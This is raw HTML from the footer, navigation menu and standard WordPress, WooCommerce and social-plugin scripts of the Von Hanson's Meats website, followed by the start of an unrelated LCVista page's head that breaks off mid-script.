class="widget_text"><h2>PRODUCTS</h2> <div class="textwidget"><a href="/beef/">Beef</a> <a href="/chicken/">Chicken</a> <a href="/pork/">Pork</a> <a href="/smokehouse/">Smokehouse</a> <a href="/deli/">Deli</a> <a href="/bakery/">Bakery</a> </div> </div><div id="text-4" class="widget_text"><h2>PRODUCTS</h2> <div class="textwidget"><a href="/bbq-headquarters/">BBQ Headquarters</a> <a href="/miscellaneous/">Miscellaneous</a> <a href="/bundles-and-variety-packs/">Bundles & Packs</a> <a href="/gluten-free-products/">Gluten Free</a> </div> </div><div id="text-5" class="widget_text"><h2>SERVICES</h2> <div class="textwidget"><a href="/wild-game-processing/">Wild Game Processing</a> <a href="/wild-game-sausage/">Wild Game Sausage</a> <a href="/drop-off-times-dates-locations/">Drop Off Times, Dates, Locations</a></div> </div><div id="text-6" class="widget_text"><h2>COMPANY</h2> <div class="textwidget"><a href="/our-history/">Our History</a> <a href="/philosophy/">Philosophy</a> <a href="/community-involvement/">Community Involvement &amp; Fundraising</a> <a href="/testimonials/">Testimonials</a> <a href="/timeline-chart/">Timeline Chart</a> <a href="/">Home</a></div> </div><div id="text-7" class="widget_text"><h2>LOCATIONS</h2> <div class="textwidget"><a href="/apple-valley/">Apple Valley, MN</a> <a href="/baxter/">Baxter, MN</a> <a href="/blaine/">Blaine, MN</a> <a href="/bloomington/">Bloomington, MN</a> <a href="/burnsville/">Burnsville, MN</a> <a href="/champlin/">Champlin, MN</a> <a href="/chanhassen/">Chanhassen, MN</a> <a href="/chaska/">Chaska, MN</a> <a href="/coon-rapids/">Coon Rapids, MN</a> </div> </div><div id="text-8" class="widget_text"><h2>LOCATIONS</h2> <div class="textwidget"><a href="/cottage-grove/">Cottage Grove, MN</a> <a href="/eagan-2/">Eagan, MN</a> <a href="/elk-river/">Elk River, MN</a> <a href="/st-paul/">St. Paul, MN</a> <a href="/lakeville/">Lakeville, MN</a> <a href="/monticello/">Monticello, MN</a> <a href="/north-oaks/">North Oaks, MN</a> <a href="/plymouth/">Plymouth, MN</a></div> </div><div id="text-9" class="widget_text"><h2>LOCATIONS</h2> <div class="textwidget"><a href="/richfield/">Richfield, MN</a> <a href="/rosemount/">Rosemount, MN</a> <a href="/savage/">Savage, MN</a> <a href="/shakopee/">Shakopee, MN</a> <a href="/st-cloud/">St. Cloud, MN</a> <a href="/woodbury/">Woodbury, MN</a> <a href="http://vonhansonsmeats.net" target="_blank">Chandler, AZ</a></div> </div><div id="text-19" class="widget_text"><h2>SPECIALS</h2> <div class="textwidget"><a href="/current-newspaper-insert/">Current Newspaper Insert</a> <a href="/monthly-specials/">Monthly Specials</a> <p><h2><a class="h2link" href="/mvg-club/">MVG Club</a></h2> <h2><a class="h2link" href="/recipes/">Recipes</a></h2></p> </div> </div> <div class="clear"></div> </div> <div id="footer" class="footer"><div class="wrap"><div id="copyright"> <p>&copy; Von Hanson's Meats. All rights reserved.</p> <p>Website by <a href="http://foxtrx.com" target="_blank">Fox Tracks</a> /<a href="http://foxtrx.com" target="_blank">Insightful Elements</a></p> <p></p> </div> </div></div></div> <!--facebook like and share js --> <div id="fb-root"></div> <script>(function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&version=v2.7"; fjs.parentNode.insertBefore(js, fjs); }(document, 'script', 'facebook-jssdk'));</script> <script type="text/javascript"> function sfsi_plus_setCookie(name, value, time) { var date = new Date(); date.setTime(date.getTime() + (time * 1000)); var expires = "; expires=" + date.toGMTString(); document.cookie = name + "=" + value + expires + "; path=/" } function sfsi_plus_getCookie(name) { var nameEQ = name + "="; var ca = document.cookie.split(';'); for (var i = 0; i < ca.length; i++) { var c = ca[i]; while (c.charAt(0) == ' ') c = c.substring(1, c.length); if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length, c.length) } return null } jQuery(document).ready(function(e) { sfsi_plus_eraseCookie("sfsi_popup"); }); function sfsi_plus_hidemypopup() { SFSI(".sfsi_plus_FrntInner").fadeOut("fast"); } </script> <script> if(typeof jQuery !== 'undefined'){ jQuery(document).ready(function($) { jQuery(document).scroll(function($) { var cookieVal = sfsi_plus_getCookie("sfsi_popup"); if(typeof cookieVal !== "string") { var y = jQuery(this).scrollTop(); if (/Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent)) { if(jQuery(window).scrollTop() + jQuery(window).height() >= jQuery(document).height()-100) { jQuery('.sfsi_plus_outr_div').css({'z-index':'9996',opacity:1,top:jQuery(window).scrollTop()+"px",position:"absolute"}); jQuery('.sfsi_plus_outr_div').fadeIn(200); jQuery('.sfsi_plus_FrntInner').fadeIn(200); } else { jQuery('.sfsi_plus_outr_div').fadeOut(); jQuery('.sfsi_plus_FrntInner').fadeOut(); } } else { if(jQuery(window).scrollTop() + jQuery(window).height() >= jQuery(document).height()-3) { jQuery('.sfsi_plus_outr_div').css({'z-index':'9996',opacity:1,top:jQuery(window).scrollTop()+200+"px",position:"absolute"}); jQuery('.sfsi_plus_outr_div').fadeIn(200); jQuery('.sfsi_plus_FrntInner').fadeIn(200); } else { jQuery('.sfsi_plus_outr_div').fadeOut(); jQuery('.sfsi_plus_FrntInner').fadeOut(); } } } }); }); } </script> <script> if(typeof jQuery != 'undefined'){ jQuery(document).ready(function(e) { jQuery("body").addClass("sfsi_plus_7.3") }); function sfsi_plus_processfurther(ref) { var feed_id = 'aEsrbmNLZ25mQVhqZFpUQzRhWlZEVVMwcGttS1VnMWtlTWg5akZkMUdYaU5xUXBtalAyZmxicUV3dW1QQVYxZVk3VCtZYi8vcHR6cFFzNFIxK05BZU1kb2t4Q2kxbVJzbUk1bkh1R0tlWXlIVGZnMWxhclA2N242NGdaQk1EZ298OEZ0N0cxTjg1VGZVeHVJaFd5L1RNNFlCZzY2eTRvUWtuQThsbDVxWFdkUT0='; var feedtype = 8; var email = jQuery(ref).find('input[name="data[Widget][email]"]').val(); var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; if ((email != "Enter your email") && (filter.test(email))) { if (feedtype == "8") { var url = "https://www.specificfeeds.com/widgets/subscribeWidget/"+feed_id+"/"+feedtype; window.open(url, "popupwindow", "scrollbars=yes,width=1080,height=760"); return true; } } else { alert("Please enter email address"); jQuery(ref).find('input[name="data[Widget][email]"]').focus(); return false; } } } </script> <style type="text/css"> .sfsi_plus_widget_sub_container .sfsiplus_norm_row.sfsi_plus_wDiv{ width:225px !important; } .sfsi_plus_shortcode_container .sfsiplus_norm_row.sfsi_plus_wDiv{ width:225px !important; } .sfsi_plus.sfsi_plus_widget_main_container { text-align: center; } .sfsi_plus.sfsi_plus_widget_main_container .sfsiplus_norm_row.sfsi_plus_wDiv { position: relative !important; float: none; margin: 0 auto; } .sfsi_plus.sfsi_plus_widget_main_container .sfsi_plus_holders { display: none; } .sfsi_plus_shortcode_container .sfsiplus_norm_row.sfsi_plus_wDiv { position: relative !important; float: none; margin: 0 auto; } .sfsi_plus_shortcode_container .sfsi_plus_holders { display: none; } .sfsiaftrpstwpr .sfsi_plus_Sicons div:first-child span, .sfsibeforpstwpr .sfsi_plus_Sicons div:first-child span { font-size: 20px; font-style: normal; font-family: inherit; color: #000000; } .sfsibeforpstwpr, .sfsiaftrpstwpr { margin-top: 5px !important; margin-bottom: 5px !important; } .sfsi_plus_rectangle_icons_shortcode_container { margin-top: 5px !important; margin-bottom: 5px !important; } .sfsi_plus_subscribe_Popinner { width: 100% !important; height: auto !important; border: 1px solid #b5b5b5 !important; padding: 18px 0px !important; background-color: #ffffff !important; } .sfsi_plus_subscribe_Popinner form { margin: 0 20px !important; } .sfsi_plus_subscribe_Popinner h5 { font-family: Helvetica,Arial,sans-serif !important; font-weight: bold !important; color: #000000 !important; font-size: 16px !important; text-align: center !important; margin: 0 0 10px !important; padding: 0 !important; } .sfsi_plus_subscription_form_field { margin: 5px 0 !important; width: 100% !important; display: inline-flex; display: -webkit-inline-flex; } .sfsi_plus_subscription_form_field input { width: 100% !important; padding: 10px 0px !important; } .sfsi_plus_subscribe_Popinner input[type=email] { font-family: Helvetica,Arial,sans-serif !important; font-style: normal !important; color: !important; font-size: 14px !important; text-align: center !important; } .sfsi_plus_subscribe_Popinner input[type=email]::-webkit-input-placeholder { font-family: Helvetica,Arial,sans-serif !important; font-style: normal !important; color: !important; font-size: 14px !important; text-align: center !important; } .sfsi_plus_subscribe_Popinner input[type=email]:-moz-placeholder { /* Firefox 18- */ font-family: Helvetica,Arial,sans-serif !important; font-style: normal !important; color: !important; font-size: 14px !important; text-align: center !important; } .sfsi_plus_subscribe_Popinner input[type=email]::-moz-placeholder { /* Firefox 19+ */ font-family: Helvetica,Arial,sans-serif !important; font-style: normal !important; color: !important; font-size: 14px !important; text-align: center !important; } .sfsi_plus_subscribe_Popinner input[type=email]:-ms-input-placeholder { font-family: Helvetica,Arial,sans-serif !important; font-style: normal !important; color: !important; font-size: 14px !important; text-align: center !important; } .sfsi_plus_subscribe_Popinner input[type=submit] { font-family: Helvetica,Arial,sans-serif !important; font-weight: bold !important; color: #000000 !important; font-size: 16px !important; text-align: center !important; background-color: #dedede !important; } </style> <div class="wprm-wrapper"> <div id="wprmenu_bar" class="wprmenu_bar bodyslide bottom"> <div class="hamburger hamburger--slider"> <span class="hamburger-box"> <span class="hamburger-inner"></span> </span> </div> <div class="menu_title"> MENU <a href="https://vonhansons.com"><img class="bar_logo" alt="logo" src="https://vonhansons.com/wp-content/uploads/2019/01/Mobile-VonHansons2.png"/></a> </div> </div> <div class="cbp-spmenu cbp-spmenu-vertical cbp-spmenu-bottom default " id="mg-wprm-wrap"> <ul id="wprmenu_menu_ul"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2123"><a href="/">Home</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1428"><a href="#">Locations</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1441"><a href="#">MN (A-Ch)</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1449"><a href="https://vonhansons.com/apple-valley/">Apple Valley</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1450"><a href="https://vonhansons.com/baxter/">Baxter</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1451"><a href="https://vonhansons.com/blaine/">Blaine</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1452"><a href="https://vonhansons.com/bloomington/">Bloomington</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1459"><a href="https://vonhansons.com/burnsville/">Burnsville</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1453"><a href="https://vonhansons.com/champlin/">Champlin</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1455"><a href="https://vonhansons.com/chanhassen/">Chanhassen</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1456"><a href="https://vonhansons.com/chaska/">Chaska</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1442"><a href="#">MN (Co-N)</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1457"><a href="https://vonhansons.com/coon-rapids/">Coon Rapids</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1458"><a href="https://vonhansons.com/cottage-grove/">Cottage Grove</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1460"><a href="https://vonhansons.com/eagan-2/">Eagan</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1461"><a href="https://vonhansons.com/elk-river/">Elk River</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1462"><a href="https://vonhansons.com/lakeville/">Lakeville</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1463"><a href="https://vonhansons.com/monticello/">Monticello</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1464"><a href="https://vonhansons.com/north-oaks/">North Oaks</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1443"><a href="#">MN (P-W)</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1465"><a href="https://vonhansons.com/plymouth/">Plymouth</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1466"><a href="https://vonhansons.com/richfield/">Richfield</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1467"><a href="https://vonhansons.com/rosemount/">Rosemount</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1468"><a href="https://vonhansons.com/savage/">Savage</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1469"><a href="https://vonhansons.com/shakopee/">Shakopee</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1470"><a href="https://vonhansons.com/st-cloud/">St. Cloud</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1471"><a href="https://vonhansons.com/st-paul/">St. Paul</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1472"><a href="https://vonhansons.com/woodbury/">Woodbury</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1444"><a href="#">Arizona</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1694"><a href="http://vonhansonsmeats.net">Chandler</a></li> </ul> </li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1445"><a href="#">Products</a> <ul class="sub-menu"> <li id="menu-item-1474" class="menu-item menu-item-type-custom menu-item-object-ubermenu-custom menu-item-has-children menu-item-1474"><a href="#ubermenu-column">1</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1475"><a href="https://vonhansons.com/beef/">Beef</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1476"><a href="https://vonhansons.com/chicken/">Chicken</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1478"><a href="https://vonhansons.com/pork/">Pork</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1479"><a href="https://vonhansons.com/smokehouse/">Smokehouse</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1477"><a href="https://vonhansons.com/deli/">Deli</a></li> </ul> </li> <li id="menu-item-1480" class="menu-item menu-item-type-custom menu-item-object-ubermenu-custom menu-item-has-children menu-item-1480"><a href="#ubermenu-column">2</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1481"><a href="https://vonhansons.com/bakery/">Bakery</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1482"><a href="https://vonhansons.com/bbq-headquarters/">BBQ Headquarters</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1484"><a href="https://vonhansons.com/miscellaneous/">Miscellaneous</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1483"><a href="https://vonhansons.com/bundles-and-variety-packs/">Bundles and Variety Packs</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2115"><a href="https://vonhansons.com/gluten-free-products/">Gluten FREE Items</a></li> </ul> </li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-1446"><a href="#">Specials</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1485"><a href="https://vonhansons.com/current-newspaper-insert/">Current Newspaper Insert / Mailer</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1486"><a href="https://vonhansons.com/monthly-specials/">Online Coupons</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1447"><a href="https://vonhansons.com/mvg-club/">Most Valuable Griller&#8217;s Club</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1448"><a href="https://vonhansons.com/recipes/">Recipes</a></li> <li> <div class="wpr_search search_top"> <form role="search" method="get" class="wpr-search-form" action="https://vonhansons.com"><label for="search-form-5cdd6e0a1ac00"></label><input type="search" class="wpr-search-field" placeholder="Search..." value="" name="s" title="Search for:"><button type="submit" class="wpr_submit"><i class="wpr-icon-search"></i></button></form> </div> </li> </ul> </div> </div> <div class="pswp" tabindex="-1" role="dialog" aria-hidden="true"> <div class="pswp__bg"></div> <div class="pswp__scroll-wrap"> <div class="pswp__container"> <div class="pswp__item"></div> <div class="pswp__item"></div> <div class="pswp__item"></div> </div> <div class="pswp__ui pswp__ui--hidden"> <div class="pswp__top-bar"> <div class="pswp__counter"></div> <button class="pswp__button pswp__button--close" aria-label="Close (Esc)"></button> <button class="pswp__button pswp__button--share" aria-label="Share"></button> <button class="pswp__button pswp__button--fs" aria-label="Toggle fullscreen"></button> <button class="pswp__button pswp__button--zoom" aria-label="Zoom in/out"></button> <div class="pswp__preloader"> <div class="pswp__preloader__icn"> <div class="pswp__preloader__cut"> <div class="pswp__preloader__donut"></div> </div> </div> </div> </div> <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap"> <div class="pswp__share-tooltip"></div> </div> <button class="pswp__button pswp__button--arrow--left" aria-label="Previous (arrow left)"></button> <button class="pswp__button pswp__button--arrow--right" aria-label="Next (arrow right)"></button> <div class="pswp__caption"> <div class="pswp__caption__center"></div> </div> </div> </div> </div> <script type="text/javascript"> var c = document.body.className; c = c.replace(/woocommerce-no-js/, 'woocommerce-js'); document.body.className = c; </script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4'></script> <script type='text/javascript'> /* <![CDATA[ */ var woocommerce_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; /* ]]> */ </script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.5.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var wc_cart_fragments_params = {"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_69ba72bd454cede7766e2e6749b43e4c","fragment_name":"wc_fragments_69ba72bd454cede7766e2e6749b43e4c"}; /* ]]> */ </script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.5.0'></script> <script type='text/javascript'> jQuery( 'body' ).bind( 'wc_fragments_refreshed', function() { jQuery( 'body' ).trigger( 'jetpack-lazy-images-load' ); } ); </script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/woocommerce/assets/js/flexslider/jquery.flexslider.min.js?ver=2.7.1'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/woocommerce/assets/js/photoswipe/photoswipe.min.js?ver=4.1.1'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/woocommerce/assets/js/photoswipe/photoswipe-ui-default.min.js?ver=4.1.1'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/js/global.js?ver=4.9.10'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/libs/devbridge-autocomplete/js/jquery.autocomplete.min.js'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/woocommerce/assets/js/select2/select2.full.min.js?ver=4.0.3'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/libs/perfect-scrollbar/js/perfect-scrollbar.jquery.min.js'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/libs/sticky-kit/js/jquery.sticky-kit.min.js'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/libs/jquery-nice-select/js/jquery.nice-select.min.js'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/js/woo-search.js'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/js/woo-shop.js'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/js/woo-add-to-cart-ajax.js'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/jetpack/_inc/build/photon/photon.min.js?ver=20130122'></script> <script type='text/javascript' src='https://vonhansons.com/wp-includes/js/jquery/ui/core.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/Ultimate-Premium-Plugin/js/shuffle/modernizr.custom.min.js?ver=4.9.10'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/Ultimate-Premium-Plugin/js/shuffle/jquery.shuffle.min.js?ver=4.9.10'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/Ultimate-Premium-Plugin/js/shuffle/random-shuffle-min.js?ver=4.9.10'></script> <script type='text/javascript'> /* <![CDATA[ */ var ajax_object = {"ajax_url":"https:\/\/vonhansons.com\/wp-admin\/admin-ajax.php","plugin_url":"https:\/\/vonhansons.com\/wp-content\/plugins\/Ultimate-Premium-Plugin\/"}; /* ]]> */ </script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/Ultimate-Premium-Plugin/js/custom.js?ver=4.9.10'></script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/vonhansons.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"cached":"1"}; /* ]]> */ </script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='https://s0.wp.com/wp-content/js/devicepx-jetpack.js?ver=201920'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/jetpack/_inc/build/lazy-images/js/lazy-images.min.js?ver=6.8'></script> <script type='text/javascript' src='https://maps.googleapis.com/maps/api/js?ver=4.9.10'></script> <script type='text/javascript'> /* <![CDATA[ */ var ubermenu_data = {"remove_conflicts":"on","reposition_on_load":"off","intent_delay":"300","intent_interval":"100","intent_threshold":"7","scrollto_offset":"50","scrollto_duration":"1000","responsive_breakpoint":"959","accessible":"on","retractor_display_strategy":"responsive","touch_off_close":"on","collapse_after_scroll":"on","v":"3.2.4","configurations":["main"],"ajax_url":"https:\/\/vonhansons.com\/wp-admin\/admin-ajax.php","plugin_url":"https:\/\/vonhansons.com\/wp-content\/plugins\/ubermenu\/"}; /* ]]> */ </script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/ubermenu/assets/js/ubermenu.min.js?ver=3.2.4'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/Ultimate-Premium-Plugin/js/whatsapp.js?ver=4.9.10'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/elementor/assets/lib/slick/slick.min.js?ver=1.8.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var passed_object = {"icon_type":"fa fa-shopping-cart","type_classes":"square"}; /* ]]> */ </script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/js/woocart-script.js?ver=4.9.10'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/js/woo-menu-canvas.js?ver=4.9.10'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/elementor-pro/assets/lib/sticky/jquery.sticky.min.js?ver=2.1.9'></script> <script type='text/javascript'> /* <![CDATA[ */ var ElementorProFrontendConfig = {"ajaxurl":"https:\/\/vonhansons.com\/wp-admin\/admin-ajax.php","nonce":"39829c2bf8","shareButtonsNetworks":{"facebook":{"title":"Facebook","has_counter":true},"twitter":{"title":"Twitter"},"google":{"title":"Google+","has_counter":true},"linkedin":{"title":"LinkedIn","has_counter":true},"pinterest":{"title":"Pinterest","has_counter":true},"reddit":{"title":"Reddit","has_counter":true},"vk":{"title":"VK","has_counter":true},"odnoklassniki":{"title":"OK","has_counter":true},"tumblr":{"title":"Tumblr"},"delicious":{"title":"Delicious"},"digg":{"title":"Digg"},"skype":{"title":"Skype"},"stumbleupon":{"title":"StumbleUpon","has_counter":true},"telegram":{"title":"Telegram"},"pocket":{"title":"Pocket","has_counter":true},"xing":{"title":"XING","has_counter":true},"whatsapp":{"title":"WhatsApp"},"email":{"title":"Email"},"print":{"title":"Print"}},"facebook_sdk":{"lang":"en_US","app_id":""}}; /* ]]> */ </script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/elementor-pro/assets/js/frontend.min.js?ver=2.1.9'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/elementor/assets/js/frontend-modules.js?ver=2.5.11'></script> <script type='text/javascript' src='https://vonhansons.com/wp-includes/js/jquery/ui/position.min.js?ver=1.11.4'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.7.1'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=4.4.6'></script> <script type='text/javascript'> var elementorFrontendConfig = {"environmentMode":{"edit":false,"wpPreview":false},"is_rtl":false,"breakpoints":{"xs":0,"sm":480,"md":768,"lg":1025,"xl":1440,"xxl":1600},"version":"2.5.11","urls":{"assets":"https:\/\/vonhansons.com\/wp-content\/plugins\/elementor\/assets\/"},"settings":{"page":[],"general":{"elementor_global_image_lightbox":"yes","elementor_enable_lightbox_in_editor":"yes"}},"post":{"id":6,"title":"Welcome to Von Hanson's Meats","excerpt":""}}; </script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=2.5.11'></script> <!-- WooCommerce JavaScript --> <script type="text/javascript"> jQuery(function($) { jQuery( 'div.woocommerce' ).on( 'click', 'a.remove', function() { var productID = jQuery( this ).data( 'product_id' ); var quantity = jQuery( this ).parent().parent().find( '.qty' ).val() var productDetails = { 'id': productID, 'quantity': quantity ? quantity : '1', }; _wca.push( { '_en': 'woocommerceanalytics_remove_from_cart', 'blog_id': '153529805', 'pi': productDetails.id, 'pq': productDetails.quantity, 'ui': 'null', } ); } ); }); </script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'> _stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:6.8',blog:'153529805',post:'6',tz:'-5',srv:'vonhansons.com'} ]); _stq.push([ 'clickTrackerInit', '153529805', '6' ]); </script> </body></html>
0
<!DOCTYPE html> <!--[if IE 7]><html class="ie ie7 ltie8 ltie9" lang="en-US"><![endif]--> <!--[if IE 8]><html class="ie ie8 ltie9" lang="en-US"><![endif]--> <!--[if !(IE 7) | !(IE 8) ]><!--> <html lang="en-US"> <!--<![endif]--> <head> <meta charset="UTF-8"/> <meta name="viewport" content="initial-scale = 1.0"/> <title>LCVista </title> <link rel="pingback" href="https://lcvista.com/xmlrpc.php"/> <link rel='dns-prefetch' href='//cdnjs.cloudflare.com'/> <link rel='dns-prefetch' href='//netdna.bootstrapcdn.com'/> <link rel='dns-prefetch' href='//fonts.googleapis.com'/> <link rel='dns-prefetch' href='//s.w.org'/> <link rel="alternate" type="application/rss+xml" title="LCVista &raquo; Feed" href="https://lcvista.com/feed/"/> <link rel="alternate" type="application/rss+xml" title="LCVista &raquo; Comments Feed" href="https://lcvista.com/comments/feed/"/> <script type="text/javascript">window._wpemojiSettings={"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/lcvista.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.0.4"}};!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var 